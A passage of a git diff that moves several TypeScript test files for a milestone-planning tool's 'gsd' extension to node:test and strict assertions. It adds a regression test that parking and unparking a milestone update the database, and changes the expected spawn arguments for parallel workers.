+      const copied = join(worktreePath, ".gsd", "milestones", "M001", "M001-ROADMAP.md");
+      assert.ok(existsSync(copied), "milestone roadmap copied to worktree");
+      assert.equal(readFileSync(copied, "utf-8"), "# Roadmap content");
+    } finally {
+      rmSync(base, { recursive: true, force: true });
+    }
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/parallel-worker-monitoring.test.ts b/src/resources/extensions/gsd/tests/parallel-worker-monitoring.test.ts
index ba7920645..43d775302 100644
--- a/src/resources/extensions/gsd/tests/parallel-worker-monitoring.test.ts
+++ b/src/resources/extensions/gsd/tests/parallel-worker-monitoring.test.ts
@@ -10,12 +10,11 @@
  *   6. completedUnits counter increments on assistant message_end
  */
 
+import assert from 'node:assert/strict';
 import { describe, it, after } from "node:test";
 import { mkdtempSync, rmSync, writeFileSync, mkdirSync } from "node:fs";
 import { join } from "node:path";
 import { tmpdir } from "node:os";
-import { createTestContext } from "./test-helpers.ts";
-
 // We test processWorkerLine indirectly via the module's exported state.
 // To test the internal function, we use the exported accessors.
 import {
@@ -27,8 +26,6 @@ import {
   refreshWorkerStatuses,
 } from "../parallel-orchestrator.ts";
 
-const { assertEq, assertTrue, report } = createTestContext();
-
 // ─── Helpers ──────────────────────────────────────────────────────────────
 
 /** Create a minimal message_end NDJSON line with cost data. */
@@ -52,7 +49,7 @@ function makeMessageEndLine(cost: number, role = "assistant"): string {
 describe("parallel-worker-monitoring", () => {
   after(() => {
     resetOrchestrator();
-    report();
+
   });
 
   // Note: processWorkerLine is not exported, so we test the observable effects
@@ -61,39 +58,39 @@ describe("parallel-worker-monitoring", () => {
 
   it("isBudgetExceeded returns false when no state exists", () => {
     resetOrchestrator();
-    assertTrue(!isBudgetExceeded(), "no state = not exceeded");
+    assert.ok(!isBudgetExceeded(), "no state = not exceeded");
   });
 
   it("isBudgetExceeded returns false when no ceiling configured", () => {
     resetOrchestrator();
     // Can't directly set state without startParallel, so test the accessor
-    assertTrue(!isBudgetExceeded(), "no ceiling = not exceeded");
+    assert.ok(!isBudgetExceeded(), "no ceiling = not exceeded");
   });
 
   it("getAggregateCost returns 0 when no state exists", () => {
     resetOrchestrator();
-    assertEq(getAggregateCost(), 0, "no state = zero cost");
+    assert.deepStrictEqual(getAggregateCost(), 0, "no state = zero cost");
   });
 
   it("isParallelActive returns false after reset", () => {
     resetOrchestrator();
-    assertTrue(!isParallelActive(), "reset = not active");
+    assert.ok(!isParallelActive(), "reset = not active");
   });
 
   it("getWorkerStatuses returns empty array when no state", () => {
     resetOrchestrator();
-    assertEq(getWorkerStatuses().length, 0, "no state = empty workers");
+    assert.deepStrictEqual(getWorkerStatuses().length, 0, "no state = empty workers");
   });
 
   it("NDJSON message_end format matches expected structure", () => {
     // Verify the NDJSON line format we expect from workers
     const line = makeMessageEndLine(0.05);
     const parsed = JSON.parse(line);
-    assertEq(parsed.type, "message_end", "type is message_end");
-    assertEq(parsed.message.role, "assistant", "role is assistant");
-    assertEq(parsed.message.usage.cost.total, 0.05, "cost.total is 0.05");
-    assertTrue(typeof parsed.message.usage.input === "number", "input is number");
-    assertTrue(typeof parsed.message.usage.output === "number", "output is number");
+    assert.deepStrictEqual(parsed.type, "message_end", "type is message_end");
+    assert.deepStrictEqual(parsed.message.role, "assistant", "role is assistant");
+    assert.deepStrictEqual(parsed.message.usage.cost.total, 0.05, "cost.total is 0.05");
+    assert.ok(typeof parsed.message.usage.input === "number", "input is number");
+    assert.ok(typeof parsed.message.usage.output === "number", "output is number");
   });
 
   it("malformed JSON does not throw (tested via parse safety)", () => {
@@ -111,7 +108,7 @@ describe("parallel-worker-monitoring", () => {
         JSON.parse(line);
       } catch {
         // Expected — processWorkerLine catches this silently
-        assertTrue(true, `malformed line "${line.slice(0, 20)}" handled`);
+        assert.ok(true, `malformed line "${line.slice(0, 20)}" handled`);
       }
     }
   });
@@ -122,26 +119,27 @@ describe("parallel-worker-monitoring", () => {
     let total = 0;
     for (const c of costs) total += c;
     // Floating point: round to 2 decimal places for comparison
-    assertEq(Math.round(total * 100) / 100, 0.28, "cost sum is correct");
+    assert.deepStrictEqual(Math.round(total * 100) / 100, 0.28, "cost sum is correct");
   });
 
   it("budget ceiling comparison works with typical values", () => {
     // Test the ceiling check pattern
     const ceiling = 5.0;
-    assertTrue(0 < ceiling, "0 is under ceiling");
-    assertTrue(4.99 < ceiling, "4.99 is under ceiling");
-    assertTrue(!(5.0 < ceiling), "5.0 is at ceiling");
-    assertTrue(!(5.01 < ceiling), "5.01 is over ceiling");
+    assert.ok(0 < ceiling, "0 is under ceiling");
+    assert.ok(4.99 < ceiling, "4.99 is under ceiling");
+    assert.ok(!(5.0 < ceiling), "5.0 is at ceiling");
+    assert.ok(!(5.01 < ceiling), "5.01 is over ceiling");
   });
 
-  it("worker spawn args include --mode json", () => {
-    // Verify the spawn command includes JSON mode for NDJSON output.
-    // We can't easily test the actual spawn, but we verify the args pattern.
-    const expectedArgs = ["--mode", "json", "--print", "/gsd auto"];
-    assertTrue(expectedArgs.includes("--mode"), "args include --mode");
-    assertTrue(expectedArgs.includes("json"), "args include json");
-    assertTrue(expectedArgs.indexOf("--mode") < expectedArgs.indexOf("json"),
-      "--mode comes before json");
+  it("worker spawn args use headless --json auto (#2792)", () => {
+    // Verify the spawn command uses headless mode (not --print which exits
+    // before auto-mode can run). See #2792.
+    const expectedArgs = ["headless", "--json", "auto"];
+    assert.ok(expectedArgs.includes("headless"), "args include headless");
+    assert.ok(expectedArgs.includes("--json"), "args include --json");
+    assert.ok(expectedArgs.includes("auto"), "args include auto");
+    assert.ok(expectedArgs.indexOf("headless") < expectedArgs.indexOf("auto"),
+      "headless comes before auto");
   });
 
   it("refreshWorkerStatuses restores persisted workers from disk", () => {
@@ -158,7 +156,6 @@ describe("parallel-worker-monitoring", () => {
             worktreePath: "/tmp/wt-M001",
             startedAt: Date.now(),
             state: "running",
-            completedUnits: 1,
             cost: 0.1,
           },
         ],
@@ -168,8 +165,8 @@ describe("parallel-worker-monitoring", () => {
       }, null, 2));
       refreshWorkerStatuses(base, { restoreIfNeeded: true });
       const workers = getWorkerStatuses();
-      assertEq(workers.length, 1, "restored one worker");
-      assertEq(workers[0].milestoneId, "M001", "worker restored from persisted state");
+      assert.deepStrictEqual(workers.length, 1, "restored one worker");
+      assert.deepStrictEqual(workers[0].milestoneId, "M001", "worker restored from persisted state");
     } finally {
       resetOrchestrator();
       rmSync(base, { recursive: true, force: true });
@@ -193,8 +190,7 @@ describe("parallel-worker-monitoring", () => {
       }, null, 2));
       refreshWorkerStatuses(base, { restoreIfNeeded: true });
       const workers = getWorkerStatuses();
-      assertEq(workers[0].state, "running", "live session status restored");
-      assertEq(workers[0].completedUnits, 3, "completed units restored from status file");
+      assert.deepStrictEqual(workers[0].state, "running", "live session status restored");
     } finally {
       resetOrchestrator();
       rmSync(base, { recursive: true, force: true });
diff --git a/src/resources/extensions/gsd/tests/park-db-sync.test.ts b/src/resources/extensions/gsd/tests/park-db-sync.test.ts
new file mode 100644
index 000000000..0580337e2
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/park-db-sync.test.ts
@@ -0,0 +1,85 @@
+/**
+ * Regression test for #2694: parkMilestone and unparkMilestone must
+ * update the DB milestone status alongside the filesystem marker.
+ *
+ * Without this, deriveStateFromDb skips unparked milestones because
+ * the DB still has status='parked', causing "All milestones complete".
+ */
+import { test } from "node:test";
+import assert from "node:assert/strict";
+import { mkdtempSync, mkdirSync, writeFileSync, rmSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+
+import { parkMilestone, unparkMilestone } from "../milestone-actions.ts";
+import {
+  openDatabase,
+  closeDatabase,
+  insertMilestone,
+  getMilestone,
+} from "../gsd-db.ts";
+
+function createBase(): string {
+  const base = mkdtempSync(join(tmpdir(), "gsd-park-db-"));
+  mkdirSync(join(base, ".gsd", "milestones", "M001"), { recursive: true });
+  writeFileSync(
+    join(base, ".gsd", "milestones", "M001", "M001-CONTEXT.md"),
+    "# M001\n\nContext.",
+  );
+  return base;
+}
+
+test("parkMilestone updates DB status to 'parked' (#2694)", () => {
+  const base = createBase();
+  try {
+    openDatabase(":memory:");
+    insertMilestone({ id: "M001", title: "Test", status: "active" });
+
+    assert.equal(getMilestone("M001")!.status, "active", "starts active");
+
+    parkMilestone(base, "M001", "deprioritized");
+
+    assert.equal(getMilestone("M001")!.status, "parked", "DB status should be parked");
+
+    closeDatabase();
+  } finally {
+    closeDatabase();
+    rmSync(base, { recursive: true, force: true });
+  }
+});
+
+test("unparkMilestone updates DB status to 'active' (#2694)", () => {
+  const base = createBase();
+  try {
+    openDatabase(":memory:");
+    insertMilestone({ id: "M001", title: "Test", status: "active" });
+
+    // Park first
+    parkMilestone(base, "M001", "deprioritized");
+    assert.equal(getMilestone("M001")!.status, "parked");
+
+    // Unpark
+    unparkMilestone(base, "M001");
+    assert.equal(getMilestone("M001")!.status, "active", "DB status should be active after unpark");
+
+    closeDatabase();
+  } finally {
+    closeDatabase();
+    rmSync(base, { recursive: true, force: true });
+  }
+});
+
+test("park/unpark are safe when DB is not available (#2694 guard)", () => {
+  const base = createBase();
+  try {
+    // No openDatabase — DB not available
+    // park/unpark should still work (filesystem-only, no throw)
+    const parked = parkMilestone(base, "M001", "test");
+    assert.ok(parked, "parkMilestone succeeds without DB");
+
+    const unparked = unparkMilestone(base, "M001");
+    assert.ok(unparked, "unparkMilestone succeeds without DB");
+  } finally {
+    rmSync(base, { recursive: true, force: true });
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/park-edge-cases.test.ts b/src/resources/extensions/gsd/tests/park-edge-cases.test.ts
index f69bfeaad..f4c54d4f4 100644
--- a/src/resources/extensions/gsd/tests/park-edge-cases.test.ts
+++ b/src/resources/extensions/gsd/tests/park-edge-cases.test.ts
@@ -12,6 +12,8 @@
  * 8. Discard milestone that has depends_on on others
  */
 
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 import { mkdtempSync, mkdirSync, rmSync, writeFileSync, readFileSync } from 'node:fs';
 import { join } from 'node:path';
 import { tmpdir } from 'node:os';
@@ -20,16 +22,6 @@ import { deriveState, invalidateStateCache } from '../state.ts';
 import { clearPathCache } from '../paths.ts';
 import { parkMilestone, unparkMilestone, discardMilestone } from '../milestone-actions.ts';
 
-let passed = 0;
-let failed = 0;
-
-function assert(condition: boolean, message: string): void {
-  if (condition) { passed++; } else { failed++; console.error(`  FAIL: ${message}`); }
-}
-function assertEq<T>(actual: T, expected: T, message: string): void {
-  if (JSON.stringify(actual) === JSON.stringify(expected)) { passed++; }
-  else { failed++; console.error(`  FAIL: ${message} — expected ${JSON.stringify(expected)}, got ${JSON.stringify(actual)}`); }
-}
 
 function createFixture(): string {
   const b = mkdtempSync(join(tmpdir(), 'gsd-edge-'));
@@ -61,11 +53,10 @@ function createM(b: string, mid: string, opts?: { roadmap?: boolean; summary?: b
 function clear(): void { clearPathCache(); invalidateStateCache(); }
 function cleanup(b: string): void { rmSync(b, { recursive: true, force: true }); }
 
-async function main(): Promise<void> {
-
   // ─── EDGE 1: Discard breaks depends_on → downstream is BLOCKED ────────
-  console.log('\n=== EDGE 1: Discard breaks depends_on chain ===');
-  {
+
+describe('park-edge-cases', () => {
+test('EDGE 1: Discard breaks depends_on chain', async () => {
     const b = createFixture();
     try {
       createM(b, 'M001', { roadmap: true, summary: true }); // complete
@@ -78,17 +69,16 @@ async function main(): Promise<void> {
 
       // M003 depends on M002 which no longer exists.
       // M002 is not in completeMilestoneIds → dep is unmet → M003 stays pending
-      assertEq(s.registry.find(e => e.id === 'M003')?.status, 'pending', 'M003 stays pending after dep discarded');
-      assertEq(s.phase, 'blocked', 'system is blocked (unmet dep on deleted milestone)');
-      assert(s.blockers.length > 0, 'blockers list is not empty');
+      assert.deepStrictEqual(s.registry.find(e => e.id === 'M003')?.status, 'pending', 'M003 stays pending after dep discarded');
+      assert.deepStrictEqual(s.phase, 'blocked', 'system is blocked (unmet dep on deleted milestone)');
+      assert.ok(s.blockers.length > 0, 'blockers list is not empty');
     } finally {
       cleanup(b);
     }
-  }
+});
 
   // ─── EDGE 2: Park blocks depends_on chain ────────────────────────────
-  console.log('\n=== EDGE 2: Park blocks depends_on chain ===');
-  {
+test('EDGE 2: Park blocks depends_on chain', async () => {
     const b = createFixture();
     try {
       createM(b, 'M001', { roadmap: true, summary: true });
@@ -98,17 +88,16 @@ async function main(): Promise<void> {
 
       parkMilestone(b, 'M002', 'testing');
       const s = await deriveState(b);
-      assertEq(s.registry.find(e => e.id === 'M003')?.status, 'pending', 'M003 pending when M002 parked');
+      assert.deepStrictEqual(s.registry.find(e => e.id === 'M003')?.status, 'pending', 'M003 pending when M002 parked');
       // System should be blocked since M003 deps unmet and M002 is parked
-      assert(s.activeMilestone === null, 'no active milestone (M002 parked, M003 dep-blocked)');
+      assert.ok(s.activeMilestone === null, 'no active milestone (M002 parked, M003 dep-blocked)');
     } finally {
       cleanup(b);
     }
-  }
+});
 
   // ─── EDGE 3: Discard active, next (no deps) activates ────────────────
-  console.log('\n=== EDGE 3: Discard active → next activates ===');
-  {
+test('EDGE 3: Discard active → next activates', async () => {
     const b = createFixture();
     try {
       createM(b, 'M001', { roadmap: true });
@@ -117,16 +106,15 @@ async function main(): Promise<void> {
 
       discardMilestone(b, 'M001');
       const s = await deriveState(b);
-      assertEq(s.activeMilestone?.id, 'M002', 'M002 becomes active');
-      assert(s.phase !== 'blocked', 'not blocked');
+      assert.deepStrictEqual(s.activeMilestone?.id, 'M002', 'M002 becomes active');
+      assert.ok(s.phase !== 'blocked', 'not blocked');
     } finally {
       cleanup(b);
     }
-  }
+});
 
   // ─── EDGE 4: Park all + discard all → clean pre-planning ─────────────
-  console.log('\n=== EDGE 4: Park all → discard all → clean state ===');
-  {
+test('EDGE 4: Park all → discard all → clean state', async () => {
     const b = createFixture();
     try {
       createM(b, 'M001', { roadmap: true });
@@ -138,30 +126,28 @@ async function main(): Promise<void> {
       discardMilestone(b, 'M001');
       discardMilestone(b, 'M002');
       const s = await deriveState(b);
-      assertEq(s.activeMilestone, null, 'no active milestone');
-      assertEq(s.phase, 'pre-planning', 'phase is pre-planning');
-      assertEq(s.registry.length, 0, 'empty registry');
-      assert(s.nextAction.includes('No milestones'), 'nextAction mentions no milestones');
+      assert.deepStrictEqual(s.activeMilestone, null, 'no active milestone');
+      assert.deepStrictEqual(s.phase, 'pre-planning', 'phase is pre-planning');
+      assert.deepStrictEqual(s.registry.length, 0, 'empty registry');
+      assert.ok(s.nextAction.includes('No milestones'), 'nextAction mentions no milestones');
     } finally {
       cleanup(b);
     }
-  }
+});
 
   // ─── EDGE 5: Discard non-existent → graceful false ───────────────────
-  console.log('\n=== EDGE 5: Discard non-existent ===');
-  {
+test('EDGE 5: Discard non-existent', () => {
     const b = createFixture();
     try {
       const result = discardMilestone(b, 'M999');
-      assert(!result, 'returns false for non-existent');
+      assert.ok(!result, 'returns false for non-existent');
     } finally {
       cleanup(b);
     }
-  }
+});
 
   // ─── EDGE 6: Queue order survives discards ───────────────────────────
-  console.log('\n=== EDGE 6: Queue order after discard ===');
-  {
+test('EDGE 6: Queue order after discard', async () => {
     const b = createFixture();
     try {
       createM(b, 'M001', { roadmap: true });
@@ -176,24 +162,23 @@ async function main(): Promise<void> {
 
       // With custom queue order, M003 should be active first
       let s = await deriveState(b);
-      assertEq(s.activeMilestone?.id, 'M003', 'M003 active (custom queue order)');
+      assert.deepStrictEqual(s.activeMilestone?.id, 'M003', 'M003 active (custom queue order)');
 
       // Discard M003 → M001 should be next per queue order
       discardMilestone(b, 'M003');
       s = await deriveState(b);
-      assertEq(s.activeMilestone?.id, 'M001', 'M001 active after M003 discarded');
+      assert.deepStrictEqual(s.activeMilestone?.id, 'M001', 'M001 active after M003 discarded');
 
       // Verify queue order file was updated
       const order = JSON.parse(readFileSync(join(b, '.gsd', 'QUEUE-ORDER.json'), 'utf-8'));
-      assert(!order.order.includes('M003'), 'M003 removed from QUEUE-ORDER.json');
+      assert.ok(!order.order.includes('M003'), 'M003 removed from QUEUE-ORDER.json');
     } finally {
       cleanup(b);
     }
-  }
+});
 
   // ─── EDGE 7: Discard milestone that has deps on others ───────────────
-  console.log('\n=== EDGE 7: Discard a milestone that depends on others ===');
-  {
+test('EDGE 7: Discard a milestone that depends on others', async () => {
     const b = createFixture();
     try {
       createM(b, 'M001', { roadmap: true });
@@ -203,23 +188,22 @@ async function main(): Promise<void> {
 
       // M002 depends on M001, so M001 is active, M002 is pending
       let s = await deriveState(b);
-      assertEq(s.activeMilestone?.id, 'M001', 'M001 is active');
-      assertEq(s.registry.find(e => e.id === 'M002')?.status, 'pending', 'M002 pending (dep on M001)');
+      assert.deepStrictEqual(s.activeMilestone?.id, 'M001', 'M001 is active');
+      assert.deepStrictEqual(s.registry.find(e => e.id === 'M002')?.status, 'pending', 'M002 pending (dep on M001)');
 
       // Discard M002 (the one WITH deps) — should be fine, M003 becomes pending
       discardMilestone(b, 'M002');
       s = await deriveState(b);
-      assertEq(s.activeMilestone?.id, 'M001', 'M001 still active');
-      assert(!s.registry.some(e => e.id === 'M002'), 'M002 gone from registry');
-      assertEq(s.registry.find(e => e.id === 'M003')?.status, 'pending', 'M003 is pending (after M001)');
+      assert.deepStrictEqual(s.activeMilestone?.id, 'M001', 'M001 still active');
+      assert.ok(!s.registry.some(e => e.id === 'M002'), 'M002 gone from registry');
+      assert.deepStrictEqual(s.registry.find(e => e.id === 'M003')?.status, 'pending', 'M003 is pending (after M001)');
     } finally {
       cleanup(b);
     }
-  }
+});
 
   // ─── EDGE 8: Park → Discard → state transitions ─────────────────────
-  console.log('\n=== EDGE 8: Park then discard same milestone ===');
-  {
+test('EDGE 8: Park then discard same milestone', async () => {
     const b = createFixture();
     try {
       createM(b, 'M001', { roadmap: true });
@@ -228,22 +212,21 @@ async function main(): Promise<void> {
 
       parkMilestone(b, 'M001', 'temp');
       let s = await deriveState(b);
-      assertEq(s.activeMilestone?.id, 'M002', 'M002 active while M001 parked');
+      assert.deepStrictEqual(s.activeMilestone?.id, 'M002', 'M002 active while M001 parked');
 
       // Now discard the parked milestone
       discardMilestone(b, 'M001');
       s = await deriveState(b);
-      assertEq(s.activeMilestone?.id, 'M002', 'M002 still active');
-      assert(!s.registry.some(e => e.id === 'M001'), 'M001 gone completely');
-      assertEq(s.registry.length, 1, 'only M002 in registry');
+      assert.deepStrictEqual(s.activeMilestone?.id, 'M002', 'M002 still active');
+      assert.ok(!s.registry.some(e => e.id === 'M001'), 'M001 gone completely');
+      assert.deepStrictEqual(s.registry.length, 1, 'only M002 in registry');
     } finally {
       cleanup(b);
     }
-  }
+});
 
   // ─── EDGE 9: Complete + parked + pending coexist ─────────────────────
-  console.log('\n=== EDGE 9: Mixed states — complete + parked + active ===');
-  {
+test('EDGE 9: Mixed states — complete + parked + active', async () => {
     const b = createFixture();
     try {
       createM(b, 'M001', { roadmap: true, summary: true }); // complete
@@ -254,23 +237,17 @@ async function main(): Promise<void> {
 
       parkMilestone(b, 'M002', 'parked');
       const s = await deriveState(b);
-      assertEq(s.registry.find(e => e.id === 'M001')?.status, 'complete', 'M001 complete');
-      assertEq(s.registry.find(e => e.id === 'M002')?.status, 'parked', 'M002 parked');
-      assertEq(s.registry.find(e => e.id === 'M003')?.status, 'active', 'M003 active');
-      assertEq(s.registry.find(e => e.id === 'M004')?.status, 'pending', 'M004 pending');
-      assertEq(s.activeMilestone?.id, 'M003', 'M003 is the active milestone');
-      assertEq(s.progress?.milestones.done, 1, '1 done');
-      assertEq(s.progress?.milestones.total, 4, '4 total');
+      assert.deepStrictEqual(s.registry.find(e => e.id === 'M001')?.status, 'complete', 'M001 complete');
+      assert.deepStrictEqual(s.registry.find(e => e.id === 'M002')?.status, 'parked', 'M002 parked');
+      assert.deepStrictEqual(s.registry.find(e => e.id === 'M003')?.status, 'active', 'M003 active');
+      assert.deepStrictEqual(s.registry.find(e => e.id === 'M004')?.status, 'pending', 'M004 pending');
+      assert.deepStrictEqual(s.activeMilestone?.id, 'M003', 'M003 is the active milestone');
+      assert.deepStrictEqual(s.progress?.milestones.done, 1, '1 done');
+      assert.deepStrictEqual(s.progress?.milestones.total, 4, '4 total');
     } finally {
       cleanup(b);
     }
-  }
+});
 
-  // ═══════════════════════════════════════════════════════════════════════
-  console.log(`\n${'='.repeat(50)}`);
-  console.log(`Results: ${passed} passed, ${failed} failed`);
-  if (failed > 0) process.exit(1);
-  else console.log('All edge cases passed!');
-}
+});
 
-main().catch(e => { console.error(e); process.exit(1); });
diff --git a/src/resources/extensions/gsd/tests/park-milestone.test.ts b/src/resources/extensions/gsd/tests/park-milestone.test.ts
index a9b3d73a6..5d9cd4efd 100644
--- a/src/resources/extensions/gsd/tests/park-milestone.test.ts
+++ b/src/resources/extensions/gsd/tests/park-milestone.test.ts
@@ -1,3 +1,5 @@
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 import { mkdtempSync, mkdirSync, rmSync, writeFileSync, existsSync, readFileSync } from 'node:fs';
 import { join } from 'node:path';
 import { tmpdir } from 'node:os';
@@ -6,26 +8,7 @@ import { deriveState, invalidateStateCache, getActiveMilestoneId } from '../stat
 import { clearPathCache } from '../paths.ts';
 import { parkMilestone, unparkMilestone, discardMilestone, isParked, getParkedReason } from '../milestone-actions.ts';
 
-let passed = 0;
-let failed = 0;
 
-function assert(condition: boolean, message: string): void {
-  if (condition) {
-    passed++;
-  } else {
-    failed++;
-    console.error(`  FAIL: ${message}`);
-  }
-}
-
-function assertEq<T>(actual: T, expected: T, message: string): void {
-  if (JSON.stringify(actual) === JSON.stringify(expected)) {
-    passed++;
-  } else {
-    failed++;
-    console.error(`  FAIL: ${message} — expected ${JSON.stringify(expected)}, got ${JSON.stringify(actual)}`);
-  }
-}
 
 // ─── Fixture Helpers ───────────────────────────────────────────────────────
 
@@ -89,30 +72,28 @@ function clearCaches(): void {
 // Tests
 // ═══════════════════════════════════════════════════════════════════════════
 
-async function main(): Promise<void> {
-
   // ─── Test 1: parkMilestone creates PARKED.md ──────────────────────────
-  console.log('\n=== parkMilestone creates PARKED.md ===');
-  {
+
+describe('park-milestone', () => {
+test('parkMilestone creates PARKED.md', () => {
     const base = createFixtureBase();
     try {
       createMilestone(base, 'M001', { withRoadmap: true });
       clearCaches();
 
       const success = parkMilestone(base, 'M001', 'Priority shift');
-      assert(success, 'parkMilestone returns true');
-      assert(isParked(base, 'M001'), 'isParked returns true after parking');
+      assert.ok(success, 'parkMilestone returns true');
+      assert.ok(isParked(base, 'M001'), 'isParked returns true after parking');
 
       const reason = getParkedReason(base, 'M001');
-      assertEq(reason, 'Priority shift', 'reason matches');
+      assert.deepStrictEqual(reason, 'Priority shift', 'reason matches');
     } finally {
       cleanup(base);
     }
-  }
+});
 
   // ─── Test 2: parkMilestone is idempotent — fails if already parked ────
-  console.log('\n=== parkMilestone fails if already parked ===');
-  {
+test('parkMilestone fails if already parked', () => {
     const base = createFixtureBase();
     try {
       createMilestone(base, 'M001', { withRoadmap: true });
@@ -120,50 +101,47 @@ async function main(): Promise<void> {
 
       parkMilestone(base, 'M001', 'First park');
       const secondPark = parkMilestone(base, 'M001', 'Second park');
-      assert(!secondPark, 'second parkMilestone returns false');
-      assertEq(getParkedReason(base, 'M001'), 'First park', 'reason unchanged from first park');
+      assert.ok(!secondPark, 'second parkMilestone returns false');
+      assert.deepStrictEqual(getParkedReason(base, 'M001'), 'First park', 'reason unchanged from first park');
     } finally {
       cleanup(base);
     }
-  }
+});
 
   // ─── Test 3: unparkMilestone removes PARKED.md ────────────────────────
-  console.log('\n=== unparkMilestone removes PARKED.md ===');
-  {
+test('unparkMilestone removes PARKED.md', () => {
     const base = createFixtureBase();
     try {
       createMilestone(base, 'M001', { withRoadmap: true });
       clearCaches();
 
       parkMilestone(base, 'M001', 'Test reason');
-      assert(isParked(base, 'M001'), 'milestone is parked');
+      assert.ok(isParked(base, 'M001'), 'milestone is parked');
 
       const success = unparkMilestone(base, 'M001');
-      assert(success, 'unparkMilestone returns true');
-      assert(!isParked(base, 'M001'), 'isParked returns false after unpark');
+      assert.ok(success, 'unparkMilestone returns true');
+      assert.ok(!isParked(base, 'M001'), 'isParked returns false after unpark');
     } finally {
       cleanup(base);
     }
-  }
+});
 
   // ─── Test 4: unparkMilestone fails if not parked ──────────────────────
-  console.log('\n=== unparkMilestone fails if not parked ===');
-  {
+test('unparkMilestone fails if not parked', () => {
     const base = createFixtureBase();
     try {
       createMilestone(base, 'M001', { withRoadmap: true });
       clearCaches();
 
       const result = unparkMilestone(base, 'M001');
-      assert(!result, 'unparkMilestone returns false when not parked');
+      assert.ok(!result, 'unparkMilestone returns false when not parked');
     } finally {
       cleanup(base);
     }
-  }
+});
 
   // ─── Test 5: deriveState returns 'parked' status ──────────────────────
-  console.log('\n=== deriveState returns parked status ===');
-  {
+test('deriveState returns parked status', async () => {
     const base = createFixtureBase();
     try {
       createMilestone(base, 'M001', { withRoadmap: true });
@@ -173,16 +151,15 @@ async function main(): Promise<void> {
 
       const state = await deriveState(base);
       const entry = state.registry.find(e => e.id === 'M001');
-      assert(!!entry, 'M001 in registry');
-      assertEq(entry?.status, 'parked', 'status is parked');
+      assert.ok(!!entry, 'M001 in registry');
+      assert.deepStrictEqual(entry?.status, 'parked', 'status is parked');
     } finally {
       cleanup(base);
     }
-  }
+});
 
   // ─── Test 6: deriveState skips parked milestone for active ─────────────
-  console.log('\n=== deriveState skips parked milestone ===');
-  {
+test('deriveState skips parked milestone', async () => {
     const base = createFixtureBase();
     try {
       createMilestone(base, 'M001', { withRoadmap: true });
@@ -191,29 +168,28 @@ async function main(): Promise<void> {
 
       // Before park: M001 is active
       const stateBefore = await deriveState(base);
-      assertEq(stateBefore.activeMilestone?.id, 'M001', 'before park: M001 is active');
+      assert.deepStrictEqual(stateBefore.activeMilestone?.id, 'M001', 'before park: M001 is active');
 
       parkMilestone(base, 'M001', 'Testing');
 
       // After park: M002 becomes active
       const stateAfter = await deriveState(base);
-      assertEq(stateAfter.activeMilestone?.id, 'M002', 'after park: M002 is active');
+      assert.deepStrictEqual(stateAfter.activeMilestone?.id, 'M002', 'after park: M002 is active');
 
       // M001 still in registry as parked
       const m001 = stateAfter.registry.find(e => e.id === 'M001');
-      assertEq(m001?.status, 'parked', 'M001 has parked status');
+      assert.deepStrictEqual(m001?.status, 'parked', 'M001 has parked status');
 
       // M002 is active
       const m002 = stateAfter.registry.find(e => e.id === 'M002');
-      assertEq(m002?.status, 'active', 'M002 has active status');
+      assert.deepStrictEqual(m002?.status, 'active', 'M002 has active status');
     } finally {
       cleanup(base);
     }
-  }
+});
 
   // ─── Test 7: getActiveMilestoneId skips parked ────────────────────────
-  console.log('\n=== getActiveMilestoneId skips parked ===');
-  {
+test('getActiveMilestoneId skips parked', async () => {
     const base = createFixtureBase();
     try {
       createMilestone(base, 'M001', { withRoadmap: true });
@@ -223,15 +199,14 @@ async function main(): Promise<void> {
       parkMilestone(base, 'M001', 'Testing');
 
       const activeId = await getActiveMilestoneId(base);
-      assertEq(activeId, 'M002', 'getActiveMilestoneId returns M002');
+      assert.deepStrictEqual(activeId, 'M002', 'getActiveMilestoneId returns M002');
     } finally {
       cleanup(base);
     }
-  }
+});
 
   // ─── Test 8: Parked milestone does NOT satisfy depends_on ─────────────
-  console.log('\n=== Parked milestone does not satisfy depends_on ===');
-  {
+test('Parked milestone does not satisfy depends_on', async () => {
     const base = createFixtureBase();
     try {
       createMilestone(base, 'M001', { withRoadmap: true });
@@ -243,18 +218,17 @@ async function main(): Promise<void> {
       const state = await deriveState(base);
       // M001 is parked, M002 depends on M001 → M002 should be pending, not active
       const m002 = state.registry.find(e => e.id === 'M002');
-      assertEq(m002?.status, 'pending', 'M002 stays pending when M001 is parked');
+      assert.deepStrictEqual(m002?.status, 'pending', 'M002 stays pending when M001 is parked');
 
       // No active milestone (both are blocked/parked)
-      assertEq(state.activeMilestone, null, 'no active milestone');
+      assert.deepStrictEqual(state.activeMilestone, null, 'no active milestone');
     } finally {
       cleanup(base);
     }
-  }
+});
 
   // ─── Test 9: Park then unpark restores correct status ─────────────────
-  console.log('\n=== Park then unpark restores status ===');
-  {
+test('Park then unpark restores status', async () => {
     const base = createFixtureBase();
     try {
       createMilestone(base, 'M001', { withRoadmap: true });
@@ -264,43 +238,41 @@ async function main(): Promise<void> {
       // Park M001
       parkMilestone(base, 'M001', 'Testing');
       const stateParked = await deriveState(base);
-      assertEq(stateParked.activeMilestone?.id, 'M002', 'while parked: M002 is active');
+      assert.deepStrictEqual(stateParked.activeMilestone?.id, 'M002', 'while parked: M002 is active');
 
       // Unpark M001 — M001 should become active again (it's first in queue)
       unparkMilestone(base, 'M001');
       const stateUnparked = await deriveState(base);
-      assertEq(stateUnparked.activeMilestone?.id, 'M001', 'after unpark: M001 is active again');
-      assertEq(stateUnparked.registry.find(e => e.id === 'M001')?.status, 'active', 'M001 is active status');
+      assert.deepStrictEqual(stateUnparked.activeMilestone?.id, 'M001', 'after unpark: M001 is active again');
+      assert.deepStrictEqual(stateUnparked.registry.find(e => e.id === 'M001')?.status, 'active', 'M001 is active status');
     } finally {
       cleanup(base);
     }
-  }
+});
 
   // ─── Test 10: discardMilestone removes directory ──────────────────────
-  console.log('\n=== discardMilestone removes directory ===');
-  {
+test('discardMilestone removes directory', async () => {
     const base = createFixtureBase();
     try {
       createMilestone(base, 'M001', { withRoadmap: true });
       clearCaches();
 
       const mDir = join(base, '.gsd', 'milestones', 'M001');
-      assert(existsSync(mDir), 'milestone dir exists before discard');
+      assert.ok(existsSync(mDir), 'milestone dir exists before discard');
 
       const success = discardMilestone(base, 'M001');
-      assert(success, 'discardMilestone returns true');
